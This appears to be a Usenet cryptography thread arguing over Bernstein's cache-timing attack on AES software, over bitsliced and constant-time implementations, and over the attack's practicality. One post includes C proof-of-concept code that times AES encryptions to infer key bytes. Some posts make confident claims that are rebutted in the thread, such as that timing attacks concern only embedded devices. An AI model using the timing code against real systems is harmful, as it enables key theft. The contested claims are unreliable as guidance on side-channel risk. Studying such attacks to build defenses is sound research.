Sure, AES as well as most other block ciphers can be
implemented in various ways "in silicon", and most
of the obvious ones won't have caches. That's not
to say that key- or data-dependent timing variations
aren't still possible, but at least it's not as hard
for the implementor to take steps to avoid them.
> Could be random. I didn't look for (and am not planning to look for)
> further patterns; 24 leaked key bits is already unacceptable.
>
> If you want to try extracting the entire key, you could look for more
> patterns in the timings, or you could arrange for different sets of
> variables to be touched before the AES call.
this being so,
it is curious why rijndael is still the 'aes',
and that the government hasn't advised a move to another symmetric algorithm,
pending further investigation.
can the cache timing atack be exploited to attack an already encrypted file,
or extract the key,
if one does not have access to the machine while it is encrypting?
vedaal
Pick your favorite among the following possible reasons:
1) because this wasn't part of the threat model / evaluation criteria
for the AES.
2) because in many environments, this attack will either not pose a threat
or can be defended against adequately.
3) because most block ciphers out there suffer from the same issue.
Sorry; I think I asked the wrong question. I meant, can one implement
AES efficiently in software using bitslice (or similar) strategies?
I guess what you are suggesting is a special-purpose
periphral "crypto machine" that has a simple architecture.
In fact these exist; Motorola's AIM was the first I know
of offered to the general public. It could be programmed
to support several independent channels, each with its own
algorithm.
Nope. I'm referring to a particular implementation strategy,
in software only (using only whatever standard CPU you already have
access to), for implementing block ciphers. This implementation strategy
is distinguished by its use of logical bitwise operations (OR, AND, XOR,
NOT, etc.) on the microprocessor to perform 32 logical operations in
parallel (on a 32-bit microprocessor). Serpent is a famous example
of a cipher amenable to this implementation strategy. I was curious
whether there are any efficient ways to implement AES using this
kind of approach.
Back before Rijndael became AES, I looked at doing this using the MMX
operations on the Pentium II (or was it the Pentium MMX? I'm not sure,
but it was something from that era) -- the idea being that you could
perform several modular inversions in parallel.
In terms of the simple operation count, it worked out to being about 1/3
of the speed of the lookup table approach, so I didn't pursue it any
further. If this is still a concern, I'll see if I can find my notes...
after I submit my thesis, get my viva scheduled, graduate, and escape
from Oxford. All my notes are in Vancouver.
Colin Percival
I think Dr. Wagner is referring to Biham's "bitslice" method of doing
32 or 64 DES encryptions in parallel using scalar registers, and asking
if it can be applied to AES. The bitslice technique can be implemented
in hardware or software. See "A Fast New DES Implementation in Software"
at http://www.cs.technion.ac.il/~biham/publications.html.
I'm sure AES can be implemented using the bitslice technique. The
question is whether that would be faster than a traditional
implementation, at least in those cases that can benefit from doing
several blocks in parallel.
--Mike Amling
Right. Thanks for digging up the pointer.
> I'm sure AES can be implemented using the bitslice technique. The
>question is whether that would be faster than a traditional
>implementation, at least in those cases that can benefit from doing
>several blocks in parallel.
I'd settle if bitslice implementations just were "not too much slower"
than ordinary implementations of AES. The motivation was whether they
could serve as a defense against cache timing attacks without incurring
too much overhead.
> > I'm sure AES can be implemented using the bitslice technique. The
> >question is whether that would be faster than a traditional
> >implementation, at least in those cases that can benefit from doing
> >several blocks in parallel.
>
> I'd settle if bitslice implementations just were "not too much slower"
> than ordinary implementations of AES. The motivation was whether they
> could serve as a defense against cache timing attacks without incurring
> too much overhead.
I've posted on my web site a variant of my AES implementation that
stores the S-box tables in banks of bits -- all 256 bit number zero
values are stored in the first 32 bytes, then the 256 bit number one
values, and so on. With the Intel cache line length of 32 bytes I
believe this version should resist the S-box timing attack.
karl m
D. J. Bernstein schrieb:
> http://cr.yp.to/papers.html#cachetiming
>
> ---D. J. Bernstein, Associate Professor, Department of Mathematics,
> Statistics, and Computer Science, University of Illinois at Chicago
How exactly would an attacker exploit the timing information to
determine some key bytes in an actual attack?
You can determine the slowest index into the lookup (which is what you
do with the program in your paper), but for that you need knowledge of
the key.
You can also determine a plaintext byte which results in slowest lookup
(provided that you can choose the plaintext for the attacked device),
but that won't help you if you don't know the actual lookup index.
Any ideas?
Best regards
Stefan
The attack actually does work. Why it works I'm not 100% sure. The
function he designed does emit a value which when xor'ed with the key
byte produces the same value over multiple runs. For instance you saw
us saying something like
byte 1, loops 256: 245 245 245 245 ...
That means for the 1st key byte the function returned "key ^ 245".
Since it's reliable you can then infer that key is actually the return
value xor'ed with 245.
The attack is highly subjective to how the function was implemented
*and* compiled. That and it's effectively impossible to exploit in
virtually any system cuz well it's a chosen plaintext attack and has to
be run as close to the system as possible.
So for example, you'd have to be logged into Amazon, somehow getting an
SSL session to encrypt thousands of texts for you while not violating
the session [on either end] to get 24 out of 128 bits. Totally likely
scenario.
In cases where a local login and chosen plaintext venue is possible the
solution would be as simple as using the 1 table method [because the
other tables are just rotated versions]. 1KB of ram would easily fit in
practically any modern L1 cache and it would get many hits that would
significantly reduce the attack. Further than that you can compute the
sbox on the fly.
DJ should get credit for developing the attack cuz it's cool. Aside
from that though I wouldn't worry about it in the field. Well... be
"aware" of the attack and use it during your design but i don't think we
have to stop the world from spinning to replace AES just yet.
Tom
I've posted on my site a version that shouldn't have input-dependent
timings and is only 10-20% slower than the naive table-driven
implementation.
www.geocities.com/malbrain/newaes3_c
karl m
This will be very slow whwn compared with normal table driven
implementations of AES on modern Intel x86 family processors.
For large messages used with pre-computed key schedules, pretty well all
decent table driven versions of AES can achieve less than 30 cycles per
byte on modern x86 processors - what will your version achieve in such
situations?
In what circumstances do you think it will be only 10-20% slower?
Brian Gladman
Tom St Denis schrieb:
> Stefan Tillich wrote:
>
>> Hi,
>>
>> D. J. Bernstein schrieb:
>>
>>> http://cr.yp.to/papers.html#cachetiming
>>>
>>> ---D. J. Bernstein, Associate Professor, Department of Mathematics,
>>> Statistics, and Computer Science, University of Illinois at Chicago
>>
>>
>>
>> How exactly would an attacker exploit the timing information to
>> determine some key bytes in an actual attack?
>>
>> You can determine the slowest index into the lookup (which is what you
>> do with the program in your paper), but for that you need knowledge of
>> the key.
>>
>> You can also determine a plaintext byte which results in slowest
>> lookup (provided that you can choose the plaintext for the attacked
>> device), but that won't help you if you don't know the actual lookup
>> index.
>>
>> Any ideas?
>
>
> The attack actually does work. Why it works I'm not 100% sure. The
> function he designed does emit a value which when xor'ed with the key
> byte produces the same value over multiple runs. For instance you saw
> us saying something like
>
> byte 1, loops 256: 245 245 245 245 ...
>
> That means for the 1st key byte the function returned "key ^ 245". Since
> it's reliable you can then infer that key is actually the return value
> xor'ed with 245.
As far as I can see it, the output is (plaintext_byte ^ key_byte), which
would be the index into one of the T tables (in 4 T-table
implementation). So IMHO you need to determine which such indexes result
in slower AES operation. To do this seems very unlikely in a real-world
setting.
The code in the paper demonstrates that there can be a dependency of AES
execution time on some index into T. What the paper is lacking (or which
should be done in a sequel paper) should be a demonstration that key
bytes can be recovered at least in a controlled laboratory setting. If
this cannot even be done in an environment, where almost all parameters
are under the attackers control, then a real-world attack is infeasible.
>
> The attack is highly subjective to how the function was implemented
> *and* compiled. That and it's effectively impossible to exploit in
> virtually any system cuz well it's a chosen plaintext attack and has to
> be run as close to the system as possible.
I agree. In my opinion, if an attack can be made then only if at least
the following information is known:
- Complete sourcecode of program which computes AES, compiler, compiler
version OR the object code
- Processor, cache organization, cache size, cache replacement strategy
- Operating system, version
>
> So for example, you'd have to be logged into Amazon, somehow getting an
> SSL session to encrypt thousands of texts for you while not violating
> the session [on either end] to get 24 out of 128 bits. Totally likely
> scenario.
As DJ said himself: To get 1 clock cycle out of timing noise due to
network latency is infeasible.
>
> In cases where a local login and chosen plaintext venue is possible the
> solution would be as simple as using the 1 table method [because the
> other tables are just rotated versions]. 1KB of ram would easily fit in
> practically any modern L1 cache and it would get many hits that would
> significantly reduce the attack. Further than that you can compute the
> sbox on the fly.
>
> DJ should get credit for developing the attack cuz it's cool. Aside
> from that though I wouldn't worry about it in the field. Well... be
> "aware" of the attack and use it during your design but i don't think we
> have to stop the world from spinning to replace AES just yet.
The least I expect from a paper on an attack is to demonstrate how it
can be done at least in the laboratory.
Best regards
Stefan Tillich
Only the S-Box and InvMixColumn functions are slower -- about 8 times
and 4 times respectively over their naive table lookup counterparts.
> For large messages used with pre-computed key schedules, pretty well all
> decent table driven versions of AES can achieve less than 30 cycles per
> byte on modern x86 processors - what will your version achieve in such
> situations?
The issue is a version of AES that can be implemented that withstands
timing attacks. I don't claim that my posted version is optimized,
only that it displays constant time when compiled with a compiler that
issues instructions for ?: expressions without jumps. Microsoft VC
version 12.00.8804 is one such compiler. I've examined the assembly
code and there are no data-dependent jumps.
> In what circumstances do you think it will be only 10-20% slower?
I compared to my previous naive table lookup program, also posted on
my site at www.geocities.com/malbrain/aes_c.html to get the 10-20%
figure. It's just a rough number derived from 74 MB in 1 Minute v.
1.20 minutes. Perhaps you'd be willing to insert the necessary CPU
instructions to obtain the cycles per byte figure you desire.
karl m
I've tried unsuccessfully to reproduce your results. I entered the
following functions from your paper. Perhaps you could illustrate my
error.
unsigned char in[4 * Nb], out[4 * Nb], key[4 * Nb];
unsigned expkey[Nb * (Nr + 1)];
__int64 rd_clock (void)
{
unsigned dwLow, dwHigh;
__asm {
rdtsc
mov dwLow, eax
mov dwHigh, edx
}
return ((__int64)dwHigh)<<32 | dwLow;
}
int aescycles ()
{
__int64 start, end;
int t;
do {
start = rd_clock();
Encrypt (in, expkey, out);
end = rd_clock ();
t = end - start;
} while( t<= 0 || t>= 1000);
return t;
}
int bestx (int b, int loops)
{
int bestx = 0, bestxt = 0;
int x, xt, i, j;
for( x = 0; x < 256; x++ ) {
xt = 0;
for( i = 0; i < loops; i++ ) {
for( j = 0; j < 16; j++ )
in[j] = xrandom() >> 16;
in[b] = x;
xt += aescycles(); xt += aescycles(), xt += aescycles();
xt += aescycles(); xt += aescycles();
}
if( xt > bestxt )
bestx = x, bestxt = xt;
}
return bestx;
}
void bernstein (char *seed)
{
int loops, b, j, k;
mrandom (strlen(seed), seed);
for( loops = 4; loops <= 65536; loops *= 2) {
for( b = 0; b < 16; b++ ) {
printf ("%.2d, %.5d loops:", b, loops);
for( k = 0; k < 10; k++ ) {
for( j = 0; j < 16; j++ )
key[j] = xrandom() >> 16;
ExpandKey (key, expkey);
printf (" %.2x", bestx (b, loops) ^ key[b]);
fflush (stdout);
}
printf ("\n");
}
}
}
The mrandom and xrandom functions are from the standard berkeley
library.
Thanks, karl m
That's trivial to achieve. The real issue is whether it is possible
to implement AES in a way that withstands timing attacks *and* is relatively
efficient, where "relatively efficient" means "not too much slower than the
best existing (non-constant-time) AES implementations".
Comparing to a very slow existing non-constant-time implementation is
not interesting. You have to compare to the best existing implementations
to get a meaningful comparison -- or, you have to report absolute performance
numbers in some accepted metric (e.g., cycles/byte).
The specific values of cycles-per-byte for the encryption function with
a pre-expanded key increased from 375 to 750 cycles per byte on my
reference implementations. While I believe from assembly code
inspection the code has a constant length with process only jumps and
running through the entire s-box table 8 times per byte-transform, the
resultant cycles per byte timings are not constant for some unknown
reason.
Meanwhile, I'm having a major problem.
I'm unable to duplicate the published attack, and frankly don't
understand
how the "simple cache-timing attack on AES" keeps the S-BOX values out
of
the cache for reload-timings during its run-after-run collections of
cycle counts. Perhaps Professor Bernstein has not implemented
something correctly, or has a hardware misconfiguration where the Level
1 or Level 2 cache is turned-off. Has anyone been able to duplicate
his result? I'll post sample code on my web site shortly.
Thanks, Karl m
That counts as extremely slow -- so slow as to render this
implementation strategy pretty useless, most likely.
>I'm unable to duplicate the published attack, and frankly don't
>understand
>how the "simple cache-timing attack on AES" keeps the S-BOX values out
>of
>the cache for reload-timings during its run-after-run collections of
>cycle counts. Perhaps Professor Bernstein has not implemented
>something correctly, or has a hardware misconfiguration where the Level
>1 or Level 2 cache is turned-off. Has anyone been able to duplicate
>his result? I'll post sample code on my web site shortly.
Are you running on the same architecture as him? The attack might be
architecture-dependent. His paper includes some comments about the fact
that Athlon caches are 2-way associative. Caches on a Pentium might well
be organized differently, leading to different timing effects (I don't know).
They're slightly smaller if you time the function after it is loaded
into the processor's cpu-cache: 226 and 628 cycles per byte.
> >I'm unable to duplicate the published attack, and frankly don't
> >understand
> >how the "simple cache-timing attack on AES" keeps the S-BOX values
out
> >of
> >the cache for reload-timings during its run-after-run collections of
> >cycle counts. Perhaps Professor Bernstein has not implemented
> >something correctly, or has a hardware misconfiguration where the
Level
> >1 or Level 2 cache is turned-off. Has anyone been able to duplicate
> >his result? I'll post sample code on my web site shortly.
>
> Are you running on the same architecture as him? The attack might be
> architecture-dependent. His paper includes some comments about the
fact
> that Athlon caches are 2-way associative. Caches on a Pentium might
well
> be organized differently, leading to different timing effects (I
don't know).
I've tried four different Athlon platforms and two Pentium:
AMD Athlon 800MHz, AMD Athlon ? MHz, AMD Athlon XP 2000, AMD Athlon
1GHz, Pentium-S 100MHz, Pentium-M. I get nothing but random numbers
for the S-Box table lookup version, with or without table lookups for
the Xtime function calls.
There seems to be some difference of opinion as to the difficulty of
obtaining a constant time AES implementation. You say it's trivial,
while Professor Bernstein says it's nearly impossible. I would say
that expecting a single implementation strategy to be sufficient for
all platforms is idealism. The only real platform where timing attacks
should be a problem is the stand-alone device, like the DES PC cards
used for electronic banking, that have 8-bit processors without caches.
Of course today, one would expect engineers to design using embedded
processors with cache. On this platform, absolute constant time would
be necessary, or randomized timing.
>From the experience of adding timing attack resistance to my reference
implementation, constant time on a pentium/athlon platform is going to
be impossible. My guess is that the market for 8-bit processors isn't
going away any time soon.
karl m
Slightly slower than 'extremely slow' is still 'very slow', alas.
>I've tried four different Athlon platforms and two Pentium:
>AMD Athlon 800MHz, AMD Athlon ? MHz, AMD Athlon XP 2000, AMD Athlon
>1GHz, Pentium-S 100MHz, Pentium-M. I get nothing but random numbers
>for the S-Box table lookup version, with or without table lookups for
>the Xtime function calls.
Huh. Well, that renders my hypothesis pretty implausible.
I have no clue, then; sorry.
>There seems to be some difference of opinion as to the difficulty of
>obtaining a constant time AES implementation. You say it's trivial,
>while Professor Bernstein says it's nearly impossible.
It's trivial. See my earlier post; you turn it into a circuit, and
then you use XOR, AND, OR, and NOT instructions.
What seems to be very difficult (perhaps nearly impossible?) is to
achieve a portable constant-time AES implementation that is almost as
fast as the best non-constant-time AES implementation. At least, I don't
know how to do it.
>I would say
>that expecting a single implementation strategy to be sufficient for
>all platforms is idealism. The only real platform where timing attacks
>should be a problem is the stand-alone device, like the DES PC cards
>used for electronic banking, that have 8-bit processors without caches.
>Of course today, one would expect engineers to design using embedded
>processors with cache. On this platform, absolute constant time would
>be necessary, or randomized timing.
That makes sense to me.
> >I've tried four different Athlon platforms and two Pentium:
> >AMD Athlon 800MHz, AMD Athlon ? MHz, AMD Athlon XP 2000, AMD Athlon
> >1GHz, Pentium-S 100MHz, Pentium-M. I get nothing but random numbers
> >for the S-Box table lookup version, with or without table lookups
for
> >the Xtime function calls.
>
> Huh. Well, that renders my hypothesis pretty implausible.
> I have no clue, then; sorry.
That brings me back to my original concern, how the timing attack works
since the complete S-Box lookup table should be loaded into the cache
after the first few timing calls. Professor Bernstein's attack runs by
timing thousands of encryptions, five for each probing random
plain-text value in each of 16 positions for a thousand loops. After
the first probe there should be no cache-load timing difference to
measure on the subsequent four calls, and in any event, the complete
S-Box table should be in cache after a very few encryption trials.
Something just doesn't add up to me.
Has anyone else checked his work? does it work only on platforms
without level 2 cache, or without both level 1 and level 2 caches?
Does it work with or without tables for the xtime function?
Thanks, karl m
Well, I guess it would be worthwile to study more. When I first saw
Professor Burnstein's "Summary of AES" I skipped over it. Now that
I've read it, and see that it's a highly optimized implementation that
expands the SBoxes from 256 into thousands of bytes. No wonder there's
a cache-timing attack.
So my proposed re-layout to the 256 byte S-Box is totally unnecessary,
and in fact my original implementation is immune to simple timing
attacks. That's why I get random numbers from the timing attack on it.
I'll look at optimizing the 227 (relatively constant) cycles per byte
using the simple 256 byte S-Box table.
Thanks, karl m
I don't believe your attack says anything beyond the unfortunate
circumstance of the SBOX TABLES not fitting into the LEVEL-ONE CACHE.
Your described AES implementation uses 4096 bytes for S-BOX tables,
and some CPUs cannot support the overall working set size of your
attack system, leading to what we can call thrashing between memory
and the CPU LEVEL-ONE CACHE.
It's easy to overcome your attack when you guarantee that the
LEVEL-ONE CACHE is of sufficient size to avoid thrashing. I don't
think that pre-loading the S-BOX into LEVEL-ONE CACHE will help in the
attacks you demonstrate BECAUSE THEY DON'T FIT IN THE FIRST PLACE.
Futhermore, since a timing attack is only of concern to an embedded
system, I fail to understand the point of the title to this thread.
The "typical software implementation" on the typical desk-top platform
has many means to expose a complete key already. Why does it matter
that there is a "simple timing attack" on these platforms? Why would
we avoid large or small S-Boxes on them, thrashing or not.
You also mention elsewhere the possibility of a remote timing attack.
AS LONG AS THE SERVER CONTAINS AN ADEQUATE LEVEL-ONE CACHE FOR THE AES
IMPLEMENTATION RUNNING ON THEM, I PREDICT YOUR ATTACK WILL FAIL TO
DEMONSTRATE ANYTHING HERE.
The only lesson I can see, which was already well known previously, is
to certify that an embedded system avoids cache thrashing and/or
offers constant time hardware access to data storage independent of
the process working set LEVEL-ONE CACHE.
karl m
Every serious AES software implementation (for the Pentium, the Athlon,
the PowerPC, etc.) works this way.
If your painfully slow software had been the fastest implementation
of Rijndael then Rijndael wouldn't have made it past the first round of
the AES competition.
No, I never said that. In fact, my paper says exactly the opposite:
``One can implement AES using these [constant-time] operations.''
Actually, what my paper says is ``One can implement AES using these
operations, of course.'' The knowledgeable reader is already aware that
every circuit can be implemented with those constant-time operations.
The problem is performance. Here's the complete sentence: ``One can
implement AES using these operations, of course, but the result is
painfully slow.'' Every fast AES implementation uses array lookups---and
making _those_ take constant time is difficult.
False. For example, the Athlon's level-1 data cache has 65536 bytes, as
stated in the sixth paragraph of the ``Load-timing variability'' section
of my paper. The most extreme AES encryption tables I've seen are 8192
bytes.
There are several reasons that preloading the tables doesn't stop timing
attacks---as the same section points out in considerable detail---but
the size of the L1 cache is not one of those reasons.
You have an inaccurate mental model of the computer's cache. If it's any
consolation, the same inaccurate model appears in previous papers on
this topic. My paper goes to considerable effort to point out the most
important errors in the model.
1. Engineers rely on rules of thumb, design guidelines, and
experience.
2. 4096 bytes out of 65536 is a significant FRACTION given the
variety of LEVEL-ONE CACHE organizations.
3. No design can overflow the LEVEL-ONE CACHE of the design platform
such that MEMORY THRASHING occurs.
I just don't see where your work fits in.
karl m
I dunno where this thread is going but rest assured his attack does in
fact work. It's highly sensistive to the machine, build options and
runtime environment but it does work.
At first I said the same thing since his attack doesn't work [as
specified] on AES as built in LTC. However, the same attack against SSL
worked fine on my AMD64.
No sense getting all upset and rude at him as the attack does in fact work.
Tom
By the same token, your problem is misapplicatiion. The system you
designed for your simple timing attack would never be designed for the
platform you ran it on. There are cpu chips with adequate LEVEL-ONE
CACHE designed sor the 4096 byte S-Boxes. What is your relevance?
karl m
karl m
You are confusing SYSTEMS with SOFTWARE. Every serious AES SYSTEM is
designed for a particular threat model. For the platforms you
published there is no PHYSICAL ACCESS where your simple timing attack
is VIABLE. Sorry.
karl m
My painfully slow software is only a REFERENCE IMPLEMENTATION. It's
part of a much larger SYSTEM. karl m
Why do you think your implementation is immune to Professor Bernstein's
simple cache attack? Does it use fewer table bytes, do you run it on
platforms with adequate cache, or some other reason?
> No sense getting all upset and rude at him as the attack does in fact
work.
Well, I've been called rude on this forum before. Do you have a copy
of Bruce S book from Spring 1999? Look at the back jacket cover for an
indication where EMOTION HAS PLAY IN CRYPTOGRAPHY.
Thanks, karl m
Different build options likely. Both of ours are based on the rijndael
teams "fast-alg" code.
>>No sense getting all upset and rude at him as the attack does in fact
>
> work.
>
> Well, I've been called rude on this forum before. Do you have a copy
> of Bruce S book from Spring 1999? Look at the back jacket cover for an
> indication where EMOTION HAS PLAY IN CRYPTOGRAPHY.
You're the one getting all upset with DJ not me. At first I called him
on the attack, verified it and now it's all coo. You seem to be angry
at him for some reason.
Sure his attack is largely impractical but it's good to learn these
things in the long run.
Tom
But you say its ORGANIZATION is? Let's see, a few rough figures. 65K
is 16 bits, or 4 plus 12. 2 ** 12 = 4096. That leaves 4 bits for the
line length and the associativity logic and whatever other unknown
design criteria get thrown in. Sounds like thin ice to me, plenty of
room for your naive-simple-cache attack to fall in.
karl m
Do you mean optimization options or platform options? How many bytes
do your S-Box tables occupy? Which processor/platform did you test on?
> >>No sense getting all upset and rude at him as the attack does in
fact
> >
> > work.
> >
> > Well, I've been called rude on this forum before. Do you have a
copy
> > of Bruce S book from Spring 1999? Look at the back jacket cover
for an
> > indication where EMOTION HAS PLAY IN CRYPTOGRAPHY.
>
> You're the one getting all upset with DJ not me. At first I called
him
> on the attack, verified it and now it's all coo. You seem to be
angry
> at him for some reason.
>
> Sure his attack is largely impractical but it's good to learn these
> things in the long run.
I think these things were already widely known before his paper. The
question then becomes, why are our tax-dollars supporting it? Which
graduate students is he working with? What are they learning from
this?
karl m
I'd assume SSL used -O2. I used -O3 [with some others]. We both use the
4KB tables with gcc 3.4.2 on an AMD64.
With SSL the attack works. With LTC it doesn't [well it might, but it
doesn't work as DJ described]
> I think these things were already widely known before his paper. The
> question then becomes, why are our tax-dollars supporting it? Which
> graduate students is he working with? What are they learning from
> this?
I'd venture a guess that nobody thought that such an attack would be so
simple or effective. I can speak for myself saying I was highly
skeptical at first.
As to "is this new?" no. But the fact that it's so applicable to AES
even with 4kb table which "easily fits" in the 64KB L1 cache through me
for a loop.
I can't tell you why specifically the attack works [and I'd love to
figure out but sans detailed specs of how the processor works best I can
do is guess] but I can assure you it does actually work.
Tom
Be careful. The naive-simple-cache timing attack only works because
the S-Box table gets thrashed in the LEVEL-ONE CACHE. Commercial
servers are going to have an overall system design that can support
the 4096 byte table. karl m
How about after the first TWO blocks. At that point the trashing will
either occur, or it won't.
> Not only that but you don't know when the cache miss occurs. Doesn't
> tell you much about which lookups actually missed [because of the change
> in input].
>
> That and both myself and Brian cannot reproduce the results doesn't bode
> well for the attack. Perhaps you could post your source code that you
> ran and we can check either we implemented it wrong or you described it
> wrong?
Professor Bernstein did post a detailed description of his encryption
implementation. Did you try implementing that? Have you tried
running the attack on your LTC code on a few different platforms and
architectures?
karl m
Then we have an answer to the naive-simple-cache timing attack.
Specify a LEVEL-ONE CACHE for an embedded system that operates at
least at the Intel P3 or P4 level.
> > Also if his intention was to suggest that implementations ought to
> > tighten up then why would he propose Salsa10 as a "new methodology"?
> >
> > I'm forming my own opinions on his motivations but I'll wait to see if
> > he'll post his test code before sharing them :-)
>
> I remain to be convinced that this is as serious as DJB is suggesting.
As well you should, as it is not based on sound engineering
principles. Have you changed your mind? karl m
Exactly. Why Professor Bersnstein is concerned about cracking SSL
with physical access on a desktop platform is beyond me too. karl m
Yes, Professor Bernstein or his students know this information. His
code multiplies the variability in question by five. I don't know why
he didn't answer your question, but when he does, perhaps he could
explain how he came to choose the multiplier.
> Does anyone know of an example of an AES implementation that can be
> compromised in this way by a remote attacker on the other side of a
> wide-area network link?
karl m
The only actual attack of any interest is against the embedded SYSTEM
which is engineered to display constant time, or display random time.
The naive-simple-cache timing attack can be expected to fail where it
is useful.
karl m
The only real world setting where timing attacks matter is against an
embedded SYSTEM, like the hardware cards used for electronic banking.
The secret keys are embedded into the "hardware" and if physical
access can be obtained (like stealing an ATM machine to get to it)
then the secret key can be obtained. Such systems must be immune to
timing attacks.
> The code in the paper demonstrates that there can be a dependency of AES
> execution time on some index into T. What the paper is lacking (or which
> should be done in a sequel paper) should be a demonstration that key
> bytes can be recovered at least in a controlled laboratory setting. If
> this cannot even be done in an environment, where almost all parameters
> are under the attackers control, then a real-world attack is infeasible.
He's hoping that someone, somewhere, engineered an embedded system
that suffers LEVEL-ONE CACHE thrashing over the 4096 byte S-Box table.
karl m
Why do you think this?
> But the effect is very dependent on setting up the AES tables in a
way
> that invokes specific cache behaviour.
How did you determine this?
> If timing attacks are a concern, much smaller tables can be used. I
> don't see the effect on any processors when AES is implemented with
> small tables (this reduces the speed by a factor of about 2).
Do you have an implementatin that demonstrates this?
karl m
> > abstract level.
>
> Right. An AES oracle---a magic box that, given n, prints AES_k(n)
> exactly one time step later---is, as far as we know,
indistinguishable
> from an oracle for a uniform random permutation.
>
> The problem is that real-world S-box lookups don't take constant
time,
> so real-world AES software doesn't take exactly one time step.
>
So you do have another view on the difficulty of implementing constant
time AES than Professor Wagner. karl m
These are all going to introduce randomness, working contrary to the
naive-simple-cache timing attack. karl m
Were any of these implementations immune to the attack? karl m
Right. This is the threat model for the desktop platform. Timing
attacks are only relevant to embedded systems. I don't see why
Professor Bernstein leaps to his "anti-sbox" stance for desktops,
either.
karl m
It's of some interest to the embedded system programmer who must ensure
that his AES design is matched to his hardware platform. What kind of
programming do you do?
karl m
Resistance to timing attacks certainly is mentioned in the AES NIST
paper I used to implement my reference implementation. In both the
MixColumn and S-Box sections. karl m
> attack is able to exploit.
Exactly right.
> But AES can be implemented at about half maximum speed with two
tables
> each of 1024 bytes (or only 1024 bytes for encryption alone). While
> this won't completely eliminate timing issues it is not pressing the
> cache anywhere near as hard and will therefore be far less likely to
be
> easily exploitatble.
Have you implemented this approach? It would help the embedded system
designer whose hardware platform is exhibiting thrashing with the
larger tables. A factor of two is certainly better than the factor of
ten in the reference implementation.
> It was this option that I had in mind. I have run DJB's timing attack
on
> this code in a P3 - where the attack works for large tables - and was
> unable to see any timing effects with his code.
Was this because the table requirements on the cache are met by the
hardware system design?
karl m
> I also did this separately and we seem to agree on what is involved.
>
> I don't see the effect described in the paper either.
>
> Brian Gladman
Did you ever make any progress on this? karl m
I have another suggestion. Why don't you try disabling the cache
altogether, and test the timing attack on both LTC and SSL. That
should settle the whole matter once and for all. I'd try it myself,
but my REFERENCE IMPLEMENTATION doesn't use up enough of the LEVEL-ONE
CACHE to see any of Professor Bernstein's effects. Thanks, karl m
I see you put quotes on the silicon portion. With programmable gate
arrays who's to say what this means in the first place. Mr. St. Denis
led me to a much easier solution, just disable the cache. He's going
to test this approach and hopefully post the results shortly.
karl m